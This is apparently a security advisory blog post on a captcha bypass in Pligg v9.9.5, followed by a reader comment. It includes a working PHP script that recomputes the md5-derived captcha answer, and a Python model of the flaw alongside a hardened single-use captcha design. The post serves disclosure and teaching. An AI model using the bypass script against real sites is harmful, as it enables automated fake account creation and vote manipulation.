Pligg v9.9.5 New Captcha Bypass Security Exploit Found
After the hurried and somewhat controversial release of Pligg v9.9.5 to fix some serious security vulnerabilities, it has come to light today that a new exploit has been discovered in v9.9.5: the registration captcha can be bypassed because of an implementation issue, so an attacker can create Pligg user accounts automatically.
Software Affected: Pligg v9.9.5
The latest version of Pligg suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for Pligg. The creation of new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19
The captcha's answer is generated the same way as in php-nuke 8.1, which was broken here:
http://www.securityfocus.com/bid/27129/info
This is a more serious attack when combined with my captcha bypass, which allows an attacker to create new user accounts.
Again the captcha is produced using md5, however the details are different: $_SERVER['HTTP_USER_AGENT'] and $ts_random can be controlled by the attacker, $sitekey is a static value, and $datekey is known because it is based on time.
Exploit:
The link to the captcha image will look something like this:
http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854
To obtain the clear-text answer, send that ts_random value to captcha_bypass.php with the same web browser (the User-Agent is part of the hash input):
http://127.0.0.1/captcha_bypass.php?ts_random=54771854
captcha_bypass.php:
<?php
// Recomputes the Pligg 9.9.5 captcha answer for the ts_random in the image URL.
// Request it with the same browser that loaded ts_image.php: the User-Agent is hashed too.
$sitekey   = 82397834;                // static value, per the advisory
$ts_random = $_REQUEST['ts_random'];  // taken from the ts_image.php URL
$datekey   = date("F j");             // e.g. "January 5", known to anyone
// hexdec() of a 32-hex-digit md5 exceeds PHP_INT_MAX and becomes a float; substr() then reads its string form.
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>
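The whole weakness, modelled end to end as an added Python example (this is not code from the advisory or from Pligg): the server derives the captcha answer from values the client supplies or can look up, so the attacker computes it offline without ever rendering the image, while the hardened class beside it shows the pattern that defeats this (random answer kept server-side under an unguessable challenge id, single use, time-limited). Assumptions: the sitekey is the 82397834 quoted above, the date key is evaluated in UTC, and PHP's float-to-string rendering of hexdec() is approximated with "%.14G" rather than reproduced bit for bit. The hardened class is an illustration of the fix pattern, not Pligg's actual patch.

```python
import hashlib
import hmac
import secrets
import time

# Static site key quoted in the advisory (assumption: unchanged in a stock install).
SITEKEY = "82397834"

MONTHS = ["January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]


def datekey_for(epoch: float) -> str:
    """PHP date("F j") for a UTC timestamp, e.g. "January 5"; anyone knows today's value."""
    t = time.gmtime(epoch)
    return f"{MONTHS[t.tm_mon - 1]} {t.tm_mday}"


def pligg_style_answer(user_agent: str, ts_random: str, datekey: str) -> str:
    """Model of substr(hexdec(md5(UA . sitekey . ts_random . datekey)), 2, 6).

    PHP's hexdec() turns a 128-bit md5 into a float and substr() then reads its
    string form ("1.2345678901235E+38"). "%.14G" approximates PHP's default
    precision=14 rendering; this is an assumption, not claimed bit-exact with PHP.
    """
    digest = hashlib.md5((user_agent + SITEKEY + ts_random + datekey).encode()).hexdigest()
    php_float_string = "%.14G" % float(int(digest, 16))
    return php_float_string[2:8]


def vulnerable_register(user_agent: str, ts_random: str, submitted: str, now: float) -> bool:
    """Server side as the advisory describes it: recompute from request data and compare."""
    expected = pligg_style_answer(user_agent, ts_random, datekey_for(now))
    return hmac.compare_digest(expected, submitted)


def attacker_register(now: float) -> bool:
    """Attacker picks the User-Agent and ts_random, derives the answer, never views the image."""
    ua = "bot/1.0"                              # any string; it is hashed, not validated
    ts_random = str(secrets.randbelow(10 ** 8))  # plays the role of the value in the image URL
    answer = pligg_style_answer(ua, ts_random, datekey_for(now))
    return vulnerable_register(ua, ts_random, answer, now)


class HardenedCaptcha:
    """Fix pattern (illustrative, not Pligg's): answer from a CSPRNG, stored server-side
    under an unguessable challenge id, usable once, time-limited. Nothing the client
    sends or can look up lets it recompute the answer."""

    def __init__(self, ttl_seconds: int = 300):
        self._pending = {}  # challenge id -> (answer, expiry)
        self.ttl = ttl_seconds

    def issue(self, now: float):
        cid = secrets.token_urlsafe(16)
        answer = "".join(secrets.choice("0123456789") for _ in range(6))
        self._pending[cid] = (answer, now + self.ttl)
        return cid, answer  # cid goes into the image URL; answer only into the rendered image

    def verify(self, cid: str, submitted: str, now: float) -> bool:
        entry = self._pending.pop(cid, None)  # pop: each challenge can be answered exactly once
        if entry is None:
            return False
        answer, expires = entry
        if now > expires:
            return False
        return hmac.compare_digest(answer, submitted)


if __name__ == "__main__":
    now = time.time()
    print("vulnerable scheme, blind registration accepted:", attacker_register(now))
    h = HardenedCaptcha()
    cid, answer = h.issue(now)
    print("hardened, correct answer:", h.verify(cid, answer, now))
    print("hardened, replay of same challenge:", h.verify(cid, answer, now))
```

Run it directly to see the vulnerable scheme accept a registration that never looked at an image, and the hardened scheme accept the real answer once and refuse the replay. The hash function is not the problem here; any derivation whose inputs the client controls or can look up is equivalent to publishing the answer.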
Thanks to Rook Security blog for the tip off.



Is this exploit present in YADC too?